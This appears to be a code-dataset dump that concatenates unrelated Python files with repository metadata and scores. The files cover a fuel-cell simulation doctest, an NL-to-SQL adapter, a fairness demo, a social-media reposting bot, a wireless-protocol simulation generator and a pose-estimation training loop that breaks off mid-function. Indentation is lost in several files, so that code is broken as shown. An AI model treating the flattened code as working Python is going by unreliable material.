PH2 : 0.1966649285946839 atm
PH2O : 0.24206059193086493 atm
PO2 : 0.19034078646315894 atm
Power-Thermal : 8.29401625290499 W
###########
I : 3.8
E : 6.068358566463993 V
Eta Activation : 0.4264559863331208 V
Eta Concentration : 0.0007590808465813247 V
Eta Ohmic : 0.006750024222922298 V
FC Efficiency : 0.49981193710908595
FC Power : 14.814425815913308 W
FC Voltage : 3.8985331094508706 V
Loss : 0.43396509140262446 V
PH2 : 0.19665087821306954 atm
PH2O : 0.2420432983355364 atm
PO2 : 0.19033285362496066 atm
Power-Thermal : 8.555574184086693 W
###########
I : 3.9
E : 6.068357026521189 V
Eta Activation : 0.42817767789163225 V
Eta Concentration : 0.0007795927885366656 V
Eta Ohmic : 0.006929978850845375 V
FC Efficiency : 0.49857958703411753
FC Power : 15.166791037577857 W
FC Voltage : 3.888920778866117 V
Loss : 0.4358872495310143 V
PH2 : 0.19663682783145514 atm
PH2O : 0.24202600474020786 atm
PO2 : 0.19032492078676233 atm
Power-Thermal : 8.818208962422144 W
###########
Report is generating ...
Done!
>>> Padulles_Amphlett_Data["Status"]
True
>>> Padulles_Amphlett_Data["P"][5]
2.724941943281497
>>> Padulles_Amphlett_Data["I"][5]
0.6
>>> Padulles_Amphlett_Data["V"][5]
4.541569905469162
>>> Padulles_Amphlett_Data["EFF"][5]
0.5822525519832258
>>> Padulles_Amphlett_Data["PO2"][5]
0.1905867044473064
>>> Padulles_Amphlett_Data["PH2"][5]
0.19710049042472996
>>> Padulles_Amphlett_Data["PH2O"][5]
0.2425966933860498
>>> Padulles_Amphlett_Data["Ph"][5]
0.9650580567185031
>>> Padulles_Amphlett_Data["VE"][5]
4.553525621759973
>>> Padulles_Amphlett_Data["V0"]
4.698326931114575
>>> Padulles_Amphlett_Data["K"]
-0.24133551559100302
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod={}, TestMode=True, PrintMode=False)
>>> Padulles_Amphlett_Data["Status"]
False
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=4)
2.9
>>> Vcell_Calc(Enernst=4.5, Loss=0.4, N=None)
[Error] Vcell Calculation Error (Enernst:4.5, Loss:0.4, N:None)
>>> Test_Vector={"A":50.6,"l":0.0178,"lambda":23,"JMax":1.5,"T":2,"N0":5,"KO2":0.0000211,"KH2":0.0000422,"KH2O":0.000007716,"tH2":3.37,"tO2":6.74,"t1":2,"t2":2,"tH2O":18.418,"rho":1.168,"qMethanol":0.0002,"CV":2,"i-start":5,"i-stop":0.1,"i-step":-2,"Name":"Test"}
>>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True)
###########
Padulles-Amphlett-Model Simulation
###########
Analyzing . . .
I : 0.1
E : 6.14455344314445 V
Eta Activation : 0.9092187394310518 V
Eta Concentration : 1.1361117401857817e-07 V
Eta Ohmic : 4.63717533307516e+269 V
FC Efficiency : -2.9725482904327946e+269
FC Power : -2.3185876665375803e+269 W
FC Voltage : -2.3185876665375803e+270 V
Loss : 4.63717533307516e+269 V
PH2 : 0.19717074233280188 atm
PH2O : 0.2426831613626925 atm
PO2 : 0.1906263686382979 atm
Power-Thermal : 2.3185876665375803e+269 W
###########
I : 2.0
E : 6.144553272737403 V
Eta Activation : 0.9103753288368093 V
Eta Concentration : 2.301179808139826e-06 V
Eta Ohmic : 9.331810347802308e+270 V
FC Efficiency : -5.981929710129684e+270
FC Power : -9.331810347802308e+271 W
FC Voltage : -4.665905173901154e+271 V
Loss : 9.331810347802308e+270 V
PH2 : 0.19690378508212852 atm
PH2O : 0.2423545830514502 atm
PO2 : 0.19047564471253012 atm
Power-Thermal : 9.331810347802308e+271 W
###########
I : 4.0
E : 6.144553093215826 V
Eta Activation : 0.9106431331307118 V
Eta Concentration : 4.6654999364844955e-06 V
Eta Ohmic : 1.8785852500552963e+271 V
FC Efficiency : -1.2042213141380103e+271
FC Power : -3.757170500110593e+272 W
FC Voltage : -9.392926250276482e+271 V
Loss : 1.8785852500552963e+271 V
PH2 : 0.19662277744984075 atm
PH2O : 0.24200871114487932 atm
PO2 : 0.19031698794856405 atm
Power-Thermal : 3.757170500110593e+272 W
###########
Report is generating ...
Warning : The value of I(>0.1) leads to minus amount of V, please check your inputs
Done!
>>> shutil.rmtree("Padulles-Amphlett")
'''
| 1.992188 | 2 |
mlld_functions.py | mdastro/My_Package | 0 | 12797518 | import numpy as np
"""
:param MLLD_functions: this class has several functions that are usually used by myself.
"""
class MLLD_functions:
def standardization(self, variable):
"""
:param variable: the array with the variables you wish to standardize
:return: standardized array
"""
var_average = np.average(variable)
var_std = np.std(variable)
new_variable = []
for i in range(variable.size):
new_variable_i = (variable[i] - var_average)/var_std
new_variable.append(new_variable_i)
self.new_variable = np.array(new_variable)
return self.new_variable
| 3.5625 | 4 |
nlidbTranslator/api/adapters/editsql/editsql_adapter.py | DataManagementLab/univerSQL | 0 | 12797519 | import random
import time
from pathlib import Path
import numpy as np
import json
import torch
from editsql.data_util import atis_batch
from editsql.data_util.atis_data import ATISDataset
from editsql.data_util.interaction import load_function
from editsql.model import model, utils_bert
from editsql.model.schema_interaction_model import SchemaInteractionATISModel
from editsql.postprocess_eval import postprocess_one
from editsql.preprocess import read_database_schema
from editsql.model.bert import tokenization as tokenization
from editsql.model.bert.modeling import BertConfig, BertModel
from adapters.editsql import parse_args_spider, parse_args_sparc
from adapters.editsql.constants import *
from api import setup_util
from api.paths import DB_SCHEMAS_FILE
class EditsqlAdapter:
"""
Uses the functionality of editsql to translate arbitrary questions into sql
"""
def __init__(self, model="spider"):
if model == "sparc":
params = parse_args_sparc.interpret_args()
else:
params = parse_args_spider.interpret_args()
# create the dataset and model
data = ATISDataset(params)
self.model = self.load_model(params, data)
_, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={})
# function used for loading of interaction in raw state
self.int_load_function = load_function(params,
data.entities_dictionary,
data.anonymizer,
database_schema=self.database_schemas)
def load_model(self, params, data):
"""
Loads the editsql translation model
Args:
params: the parsed arguments
data: the ATISDataset
Returns:
the loaded SchemaInteractionATISModel
"""
model = SchemaInteractionATISModel(
params,
data.input_vocabulary,
data.output_vocabulary,
data.output_vocabulary_schema,
data.anonymizer if params.anonymize and params.anonymization_scoring else None)
model.load_state_dict(torch.load(params.save_file,map_location='cpu'))
print("Loaded model from file " + params.save_file)
model.eval()
return model
def prepare_interaction(self, nl_questions, db_id, prev_predictions):
"""
Creates an InteractionItem that contains the natural language question and the database id
Args:
nl_questions: the natural language questions
db_id: the database that acts as context
prev_predictions: the previous predictions
Returns:
an InteractionItem that contains the natural language question and the database id
"""
# establish the structure of an interaction in raw state
example = dict()
example["final"] = dict()
example["interaction"] = []
# fill the general fields
example["id"] = "dummy id"
example["scenario"] = ""
example["interaction_id"] = 42
# fill the content fields
example["database_id"] = db_id
prev_predictions.append("dummy sql query")
for i, nl_q in enumerate(nl_questions):
sql_int = [(prev_predictions[i].split(), [])]
example["interaction"].append({"utterance": nl_q, "sql": sql_int})
example["final"]["utterance"] = nl_questions[-1]
example["final"]["sql"] = "query to be predicted"
# transform the raw interaction to an InteractionItem
obj, _ = self.int_load_function(example)
interaction = atis_batch.InteractionItem(obj)
return interaction
def translate(self, nl_question, db_id):
"""
Translate a single natural language question into sql
Args:
nl_question: the natural language question
db_id: the database that acts as context
Returns:
the sql prediction
"""
# preprocess
nl_questions = [nl_question]
interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[])
prediction = self.predict(interaction)
return self.post_process(prediction, db_id)
def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions):
"""
Predict the sql for the next utterance in an interaction
Args:
nl_question: the natural language question
db_id: the database that acts as context
prev_nl_questions: the previous questions or an empty list
prev_predictions: the previous predictions or an empty list
Returns:
the sql prediction
"""
# preprocess
nl_questions = prev_nl_questions + [nl_question]
interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions)
prediction = self.predict(interaction)
return self.post_process(prediction, db_id)
def predict(self, interaction):
prediction = self.model.predict_with_predicted_queries(interaction, 1000)
pred_tokens_raw = prediction[-1][0]
pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol
pred_str = " ".join(pred_tokens)
return pred_str
def post_process(self, prediction, db_id):
schema = self.database_schemas[db_id]
post_processed = postprocess_one(prediction, schema)
return post_processed
# ------------ Evaluation -----------------
def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False):
"""
Evaluate the translation output of EditsqlAdapter.
By default the prediction results of standalone editsql act as the reference.
The use_gold_query switch enables comparison with the gold queries from spider
Args:
amount: the amount of samples to use
randomness: randomly choose samples
show_all: write all samples, not only those with errors
use_gold_query: comparison with the gold queries from spider instead of the prediction results of standalone editsql
"""
# load the prediction results of standalone editsql
with open(EVAL_REFERENCE_FILE) as infile:
references = json.load(infile)
if not amount:
# let amount default to _all_ examples from the file
amount = len(references)
# determine the instances to test on
if randomness:
sample_indices = random.sample(range(len(references)), k=amount)
else:
sample_indices = range(amount)
comparisons = []
num_errors = 0
start = time.time()
for i in sample_indices:
db_id = references[i]["database_id"]
in_seq_raw = references[i]["input_seq"]
in_seq = " ".join(in_seq_raw)
schema = self.database_schemas[db_id]
dev_prediction_raw = references[i]["flat_prediction"]
dev_prediction = " ".join(dev_prediction_raw)
dev_prediction = postprocess_one(dev_prediction, schema)
translation = self.translate(in_seq, db_id)
gold = " ".join(references[i]["gold_query"])
gold = postprocess_one(gold, schema)
# normalize and prevent numbering from distorting the results
gold_norm = ''.join("0" if c.isdigit() else c.lower() for c in gold)
dev_pred_norm = ''.join("0" if c.isdigit() else c.lower() for c in dev_prediction)
translation_norm = ''.join("0" if c.isdigit() else c.lower() for c in translation)
if use_gold_query:
is_error = translation_norm != gold_norm
else:
is_error = translation_norm != dev_pred_norm
if is_error:
num_errors += 1
if is_error or show_all:
comparison = dict()
comparison["identifier"] = references[i]["identifier"]
comparison["is_equal"] = not is_error
comparison["input_seq"] = in_seq
comparison["prediction"] = {}
if use_gold_query:
comparison["prediction"]["gold "] = gold
else:
comparison["prediction"]["editsql "] = dev_prediction
comparison["prediction"]["translation"] = translation
comparisons.append(comparison)
end = time.time()
duration = end - start
time_per_item = duration / amount
num_correct = amount - num_errors
accuracy = num_correct * 100 / amount
eval_output = dict()
eval_output["time per item"] = time_per_item
eval_output["# items"] = amount
eval_output["% equal"] = accuracy
if show_all:
eval_output["content"] = comparisons
else:
eval_output["diff"] = comparisons
write_json_log_results(eval_output, CURRENT_DIR / "evaluation/results")
# ------------ Batch processing -----------------
@classmethod
def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR):
"""
Read the list of dicts with values for nl_question and db_id from the input file
and save the translations to a file in the output directory
Args:
input_file: path of file with list of dicts with values for nl_question and db_id
output_dir: path of dir where the translations are saved
"""
edi_adap = EditsqlAdapter()
with open(input_file) as f:
requests = json.load(f)
for i, request in enumerate(requests):
request["sql"] = edi_adap.translate(request["nl_question"], request["db_id"])
write_json_log_results(requests, output_dir)
def write_json_log_results(content, directory):
path = Path(directory)
filename = time.strftime("%Y_%m_%d-%H_%M_%S") + ".json"
with open(str(path / filename), 'w') as outfile:
json.dump(content, outfile, indent=4)
# define a modified embeddings loading function that makes use of the preloaded glove
def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params):
glove_embedding_size = 300
# ------- use preloaded glove -----------
glove_embeddings = setup_util.glove_embeddings
# ---------------------------------------
input_embedding_size = glove_embedding_size
def create_word_embeddings(vocab):
vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32)
vocabulary_tokens = vocab.inorder_tokens
glove_oov = 0
para_oov = 0
for token in vocabulary_tokens:
token_id = vocab.token_to_id(token)
if token in glove_embeddings:
vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token]
else:
glove_oov += 1
print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab))
return vocabulary_embeddings
input_vocabulary_embeddings = create_word_embeddings(input_vocabulary)
output_vocabulary_embeddings = create_word_embeddings(output_vocabulary)
output_vocabulary_schema_embeddings = None
if output_vocabulary_schema:
output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema)
return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size
# overwrite the original embeddings loading function with the modified version
model.load_word_embeddings = load_word_embeddings_for_editsql
# define a modified version with absolute path instead of relative path in the first line
def get_bert(params):
BERT_PT_PATH = str(TRANSLATORS_DIR / "editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param")
map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12',
'uL': 'uncased_L-24_H-1024_A-16',
'cS': 'cased_L-12_H-768_A-12',
'cL': 'cased_L-24_H-1024_A-16',
'mcS': 'multi_cased_L-12_H-768_A-12'}
bert_type = map_bert_type_abb[params.bert_type_abb]
if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS':
do_lower_case = False
else:
do_lower_case = True
no_pretraining = False
bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')
vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')
init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin')
print('bert_config_file', bert_config_file)
print('vocab_file', vocab_file)
print('init_checkpoint', init_checkpoint)
bert_config = BertConfig.from_json_file(bert_config_file)
tokenizer = tokenization.FullTokenizer(
vocab_file=vocab_file, do_lower_case=do_lower_case)
bert_config.print_status()
model_bert = BertModel(bert_config)
if no_pretraining:
pass
else:
model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu'))
print("Load pre-trained parameters.")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model_bert.to(device)
return model_bert, tokenizer, bert_config
# overwrite the original function with the modified version
utils_bert.get_bert = get_bert
| 2.375 | 2 |
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 | <filename>tests/r/test_rep_vict.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
"""Test module rep_vict.py by downloading
rep_vict.csv and testing shape of
extracted data has 8 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = rep_vict(test_path)
try:
assert x_train.shape == (8, 8)
except:
shutil.rmtree(test_path)
raise()
| 2.421875 | 2 |
fairness/algorithms/zafar/fair-classification-master/disparate_impact/synthetic_data_demo/fairness_acc_tradeoff.py | yashwarlord/fairness-comparison | 146 | 12797521 | <reponame>yashwarlord/fairness-comparison
import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a performance measure
def test_synthetic_data():
""" Generate the synthetic data """
X, y, x_control = generate_synthetic_data(plot_data=False)
ut.compute_p_rule(x_control["s1"], y) # compute the p-rule in the original data
""" Classify the data without any constraints """
apply_fairness_constraints = 0
apply_accuracy_constraint = 0
sep_constraint = 0
loss_function = lf._logistic_loss
X = ut.add_intercept(X) # add intercept to X before applying the linear classifier
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)])
print
print "== Unconstrained (original) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now classify such that we achieve perfect fairness """
apply_fairness_constraints = 1
cov_factor = 0
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])
print
print "== Constrained (fair) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now plot a tradeoff between the fairness and accuracy """
ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])
def main():
test_synthetic_data()
if __name__ == '__main__':
main() | 2.84375 | 3 |
revivesocialmedia/revivesocialmedia.py | MSAdministrator/revive-social-media | 0 | 12797522 | <gh_stars>0
from .opensourceprojects import OpenSourceProjects
from .blogposts import BlogPosts
from .posttweet import PostTweet
from .postlinkedin import PostLinkedIn
class ReviveSocialMedia:
_OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts'
_BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts'
def blog(self):
random_blog = BlogPosts().get()
try:
message = self._BLOG_MESSAGE.format(
name=random_blog['title'],
url=random_blog['link']
)
PostTweet().post(message)
except:
print("Error posting to Twitter")
pass
try:
PostLinkedIn().post(
message,
random_blog['title'],
random_blog['link']
)
except:
print("Error posting to LinkedIn")
pass
#self.blog()
def oss(self):
random_project = OpenSourceProjects().get()
tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url'])
try:
if 'documentation' in random_project:
tweet = tweet + ' Docs: {}'.format(random_project.get('documentation',''))
if 'repository' in random_project:
tweet = tweet + ' Repo: {}'.format(random_project.get('repository',''))
if 'type' in random_project:
tweet = tweet + ' #{}'.format(random_project.get('type',''))
PostTweet().post(tweet)
except:
print("Error posting to Twitter")
pass
try:
PostLinkedIn().post(
tweet,
random_project['name'],
random_project['url']
)
except:
print("Error posting to LinkedIn")
pass
#self.oss()
| 2.578125 | 3 |
test_tools/simgen_ta.py | mpastyl/Arctium | 0 | 12797523 | #!/usr/bin/env python2.7
import sys
import argparse
import traceback
ap = argparse.ArgumentParser(description='Simulation generator')
ap.add_argument('--basepath', required=False, default="../..",
help='Base path')
ap.add_argument('-c', '--config', required=False, default="params.py",
help='Configuration python file')
args = ap.parse_args()
import os
from collections import namedtuple, OrderedDict
from shutil import copy, rmtree
import traceback
import subprocess
import itertools
import re
import random
basepath = args.basepath
#apppath = os.path.join(basepath, "apps", "glossy-test")
#apppath = os.path.join(basepath, "apps", "ta")
apppath = os.path.join(basepath, "apps", "crystal")
sys.path += [".", os.path.join(basepath,"test_tools")]
params = args.config
def rnd_unique(nodes, n):
l = 0
r = []
while (l<n):
x = random.choice(nodes)
if x not in r:
r.append(x)
l += 1
return r
def generate_table_array(nodes, num_epochs, concurrent_txs):
tbl = []
if seed is not None:
random.seed(seed)
for _ in xrange(num_epochs):
tbl += rnd_unique(nodes, concurrent_txs)
return "static const uint8_t sndtbl[] = {%s};"%",".join([str(x) for x in tbl])
binary_name = "crystal.sky"
def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env):
env = os.environ.copy()
env.update(new_env)
abs_bname = os.path.join(apppath, binary_name)
abs_ihex_name = abs_bname + ".ihex"
abs_tbl_name = os.path.join(apppath, "sndtbl.c")
abs_env_name = abs_bname + ".env"
with open(abs_tbl_name, "w") as f:
f.write(generate_table_array(nodes, num_epochs, concurrent_txs))
pwd = os.getcwd()
os.chdir(apppath)
subprocess.check_call(["sh","-c","./build_simgen.sh"], env=env)
os.chdir(pwd)
try:
os.makedirs(simdir)
except OSError,e:
print e
nodelist = os.path.join(simdir, "nodelist.txt")
with open(nodelist, "w") as f:
for n in nodes:
f.write("%d\n"%n)
copy(abs_bname, simdir)
copy(abs_ihex_name, simdir)
copy(abs_env_name, simdir)
copy(abs_tbl_name, simdir)
def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca):
cflags = [
"-DTX_POWER=%d"%power,
"-DRF_CHANNEL=%d"%channel,
"-DCRYSTAL_SINK_ID=%d"%sink,
"-DSTART_EPOCH=%d"%start_epoch,
"-DCONCURRENT_TXS=%d"%num_senders,
"-DNUM_ACTIVE_EPOCHS=%d"%active_epochs,
"-DCRYSTAL_CONF_PERIOD=%f"%period,
"-DN_TX_S=%d"%n_tx_s,
"-DN_TX_T=%d"%n_tx_t,
"-DN_TX_A=%d"%n_tx_a,
"-DDUR_S_MS=%d"%dur_s,
"-DDUR_T_MS=%d"%dur_t,
"-DDUR_A_MS=%d"%dur_a,
"-DCRYSTAL_SYNC_ACKS=%d"%sync_ack,
"-DCRYSTAL_LONGSKIP=%d"%longskip,
"-DCRYSTAL_PAYLOAD_LENGTH=%d"%payload,
"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d"%n_empty.r,
"-DCRYSTAL_MAX_SILENT_TAS=%d"%n_empty.y,
"-DCRYSTAL_MAX_MISSING_ACKS=%d"%n_empty.z,
"-DCRYSTAL_SINK_MAX_NOISY_TS=%d"%n_empty.x,
"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d"%dyn_nempty,
"-DCCA_THRESHOLD=%d"%cca.dbm,
"-DCCA_COUNTER_THRESHOLD=%d"%cca.counter,
"-DCHHOP_MAPPING=CHMAP_%s"%chmap,
"-DBOOT_CHOPPING=BOOT_%s"%boot_chop,
"-DN_FULL_EPOCHS=%d"%full_epochs,
]
if logging:
cflags += ["-DCRYSTAL_LOGGING=1"]
else:
cflags += ["-DDISABLE_UART=1"]
if testbed in ("indriya", "fbk", "twist"):
cflags += ["-DTINYOS_SERIAL_FRAMES=1"]
if testbed in ("indriya", "fbk", "flock", "twist"):
cflags += ["-DTINYOS_NODE_ID=1"]
if testbed == "indriya":
cflags += ["-DSHORT_LOGS=1"]
if testbed == "cooja":
cflags += ["-DCOOJA=1"]
if testbed in ("indriya", "fbk"):
cflags += ["-DCRYSTAL_START_DELAY_SINK=40", "-DCRYSTAL_START_DELAY_NONSINK=20"]
else:
cflags += ["-DCRYSTAL_START_DELAY_SINK=0", "-DCRYSTAL_START_DELAY_NONSINK=0"]
cflags = " ".join(cflags)
new_env = {"CFLAGS":cflags}
return new_env
glb = {}
pars = {}
execfile(params, glb, pars)
def set_defaults(dst, src):
for k,v in src.items():
if k not in dst:
dst[k] = v
CcaTuple = namedtuple("CcaTuple", "dbm counter")
NemptyTuple = namedtuple("NemptyTuple", "r y z x")
defaults = {
"period":2,
"sync_ack":1,
"dyn_nempty":0,
#"n_emptys":[(2, 2, 4, 0)],
"nodemaps":["all"],
"ccas":[(-32, 100)],
"payload":2,
#"chmap":"nohop",
#"boot_chop":"nohop",
"logging":True,
"seed":None,
}
set_defaults(pars, defaults)
print "using the following params"
print pars
globals().update(pars)
print "--- Preparing simulations ------------------------"
all_nodes = set()
with open("nodelist.txt") as f:
for l in f:
l = l.strip()
if l:
all_nodes.add(int(l.strip()))
simnum = 0
for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps):
n_empty = NemptyTuple(*n_empty)
cca = CcaTuple(*cca)
simdir = "sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop)
if os.path.isdir(simdir):
continue
try:
nodemap_txt = nodemap+".txt"
if nodemap != "all" and not os.path.exists(nodemap_txt):
raise Exception("Node map file does not exist: " + nodemap_txt)
nodes = set(all_nodes)
if nodemap != "all":
with open(nodemap_txt) as f:
for l in f:
l = l.strip()
if l:
nodes.remove(int(l.strip().split()[0]))
if sink not in nodes:
raise Exception("Sink node doesn't exist")
all_senders = [x for x in nodes if x!=sink]
new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca)
prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env)
if nodemap != "all":
copy(nodemap_txt, os.path.join(simdir, "nodemap.txt"))
num_nodes = len(all_senders)
with open(os.path.join(simdir, "params_tbl.txt"), "w") as f:
p = OrderedDict()
p["testbed"] = testbed
p["num_nodes"] = num_nodes
p["active_epochs"] = active_epochs
p["start_epoch"] = start_epoch
p["seed"] = seed
p["power"] = power
p["channel"] = channel
p["period"] = period
p["senders"] = num_senders
p["sink"] = sink
p["n_tx_s"] = n_tx_s
p["n_tx_t"] = n_tx_t
p["n_tx_a"] = n_tx_a
p["dur_s"] = dur_s
p["dur_a"] = dur_a
p["dur_t"] = dur_t
p["sync_ack"] = sync_ack
p["longskip"] = longskip
p["n_empty"] = n_empty.r
p["n_empty.y"] = n_empty.y
p["n_empty.z"] = n_empty.z
p["n_empty.x"] = n_empty.x
p["nodemap"] = nodemap
p["cca"] = cca.dbm
p["cca_cnt"] = cca.counter
p["payload"] = payload
p["chmap"] = chmap
p["boot_chop"] = boot_chop
p["full_epochs"] = full_epochs
header = " ".join(p.keys())
values = " ".join([str(x) for x in p.values()])
f.write(header)
f.write("\n")
f.write(values)
f.write("\n")
simnum += 1
except Exception, e:
traceback.print_exc()
if os.path.isdir(simdir):
rmtree(simdir)
raise e
print "%d simulation(s) generated"%simnum
| 1.929688 | 2 |
lib/core/function.py | AIprogrammer/AdvMix | 11 | 12797524 | <gh_stars>10-100
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import logging
import os, copy
import numpy as np
import torch
from core.evaluate import accuracy
from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D
from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda
from utils.vis import save_debug_images
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
logger = logging.getLogger(__name__)
def train(config, args, train_loader, model, criterion, optimizer, epoch,
output_dir, tb_log_dir, writer_dict):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
if isinstance(model, list):
model = model[0].train()
model_D = model[1].train()
else:
model.train()
end = time.time()
for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)):
data_time.update(time.time() - end)
outputs = model(input)
target = target[0].cuda(non_blocking=True)
target_hm = target
target_weight = target_weight.cuda(non_blocking=True)
loss = criterion(outputs, target, target_weight)
# compute gradient and do update step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
losses.update(loss.item(), input.size(0))
_, avg_acc, cnt, pred = accuracy(outputs,
target, args=None, cfg=config)
outputs = _tocuda(outputs)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
if i % config.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses, acc=acc)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)
save_debug_images(config, input, meta, target_hm, pred*4, outputs,
prefix)
def set_require_grad(nets, requires_grad=True):
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch,
output_dir, tb_log_dir, writer_dict):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
if isinstance(models, list):
model = models[0].train()
model_G = models[1].train()
model_teacher = models[2].eval()
else:
models.train()
optimizer = optimizers[0]
optimizer_G = optimizers[1]
end = time.time()
for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)):
data_time.update(time.time() - end)
# mask_channel = meta['model_supervise_channel'] > 0.5
if isinstance(inputs, list):
inputs = [_.cuda(non_blocking=True) for _ in inputs]
target = targets[0].cuda(non_blocking=True)
target_weight = target_weights[0].cuda(non_blocking=True)
meta = metas[0]
else:
inputs = inputs.cuda(non_blocking=True)
G_input = torch.cat(inputs, dim=1)
mix_weight = F.softmax(model_G(G_input), dim=1)
set_require_grad(model, True)
optimizer.zero_grad()
tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1)
for list_index in range(1, len(inputs)):
tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1)
D_output_detach = model(tmp.detach())
with torch.no_grad():
teacher_output = model_teacher(inputs[0])
loss_D_hm = criterion(D_output_detach, target, target_weight)
loss_D_kd = criterion(D_output_detach, teacher_output, target_weight)
loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha
loss_D.backward()
optimizer.step()
# G: compute gradient and do update step
set_require_grad(model, False)
optimizer_G.zero_grad()
outputs = model(tmp)
output = outputs
loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight
